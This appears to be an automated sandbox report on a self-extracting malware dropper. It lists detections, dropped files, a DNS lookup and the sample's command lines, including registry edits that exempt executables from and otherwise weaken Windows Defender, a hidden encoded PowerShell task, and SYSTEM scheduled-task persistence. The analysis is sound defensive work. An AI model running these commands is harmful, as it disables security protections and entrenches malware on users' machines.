Source: file.exe |
ReversingLabs: Detection: 39% |
Source: service-domain.xyz |
Virustotal: Detection: 11% |
Perma Link |
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe |
Avira: detection malicious, Label: HEUR/AGEN.1250601 |
Source: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\RFYnzaH.exe |
Avira: detection malicious, Label: HEUR/AGEN.1250601 |
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe |
Avira: detection malicious, Label: HEUR/AGEN.1250601 |
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe |
ReversingLabs: Detection: 41% |
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe |
ReversingLabs: Detection: 51% |
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe |
ReversingLabs: Detection: 51% |
Source: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\RFYnzaH.exe |
ReversingLabs: Detection: 51% |
Source: file.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0040553A FindFirstFileA, |
0_2_0040553A |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA, |
0_2_004055DE |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Temp\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\__data__\ |
Jump to behavior |
Source: |
DNS query: service-domain.xyz |
Source: powershell.exe, 00000011.00000002.412093333.000001A8F98D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.440371614.000000000287E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000011.00000002.403370580.000001A8F7925000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micr |
Source: powershell.exe, 00000011.00000002.331705203.000001A88156F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.306360805.000001A880270000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.394976607.000001A8901A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000011.00000002.305770495.000001A880203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000011.00000002.303899135.000001A880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.447061574.0000000002F01000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: powershell.exe, 00000011.00000002.305770495.000001A880203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000011.00000002.305770495.000001A880203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000011.00000002.413168251.000001A8F993B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://go.microsoft.co |
Source: powershell.exe, 00000011.00000002.331705203.000001A88156F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.306360805.000001A880270000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.394976607.000001A8901A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.org |
Source: powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.orgX |
Source: powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand |
Source: unknown |
DNS traffic detected: queries for: service-domain.xyz |
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe |
Process created: Commandline size = 3260 |
|
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe |
Process created: Commandline size = 3260 |
Jump to behavior |
Source: file.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe |
File deleted: C:\Windows\SysWOW64\GroupPolicykaNvH |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe |
File created: C:\Windows\system32\GroupPolicy\gpt.ini |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004162A6 |
0_2_004162A6 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0040E5A5 |
0_2_0040E5A5 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004126B0 |
0_2_004126B0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00403A01 |
0_2_00403A01 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00418EF1 |
0_2_00418EF1 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00418FCB |
0_2_00418FCB |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 38_2_02E4C238 |
38_2_02E4C238 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 38_2_02E4C2C3 |
38_2_02E4C2C3 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 38_2_02E4C300 |
38_2_02E4C300 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 38_2_02E4F2B8 |
38_2_02E4F2B8 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 38_2_06269720 |
38_2_06269720 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 38_2_06279078 |
38_2_06279078 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 38_2_0627E049 |
38_2_0627E049 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 38_2_0627E058 |
38_2_0627E058 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 38_2_06279078 |
38_2_06279078 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 38_2_06270006 |
38_2_06270006 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 38_2_06270040 |
38_2_06270040 |
Source: C:\Users\user\Desktop\file.exe |
Code function: String function: 00403A9C appears 33 times |
|
Source: C:\Users\user\Desktop\file.exe |
Code function: String function: 00413954 appears 179 times |
|
Source: file.exe, 00000000.00000000.246681681.0000000000427000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe |
Source: file.exe |
Binary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 |
Source: Joe Sandbox View |
Dropped File: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe 8B691E37EECDDAACD1BB83067CE261157895DEC8302E558C5C9D159C117151A4 |
Source: Joe Sandbox View |
Dropped File: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B |
Source: Joe Sandbox View |
Dropped File: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B |
Source: file.exe |
ReversingLabs: Detection: 39% |
Source: C:\Users\user\Desktop\file.exe |
File read: C:\Users\user\Desktop\file.exe |
Jump to behavior |
Source: file.exe |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\file.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: unknown |
Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe |
|
Source: C:\Users\user\Desktop\file.exe |
Process created: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe .\Install.exe |
|
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe |
Process created: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe .\Install.exe /S /site_id "525403" |
|
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gbyyEslRl" |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force |
|
Source: C:\Windows\System32\gpupdate.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Windows\System32\gpscript.exe gpscript.exe /RefreshSystemParam |
|
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gbyyEslRl" |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:16:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe\" DC /site_id 525403 /S" /V1 /F |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe DC /site_id 525403 /S |
|
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAc |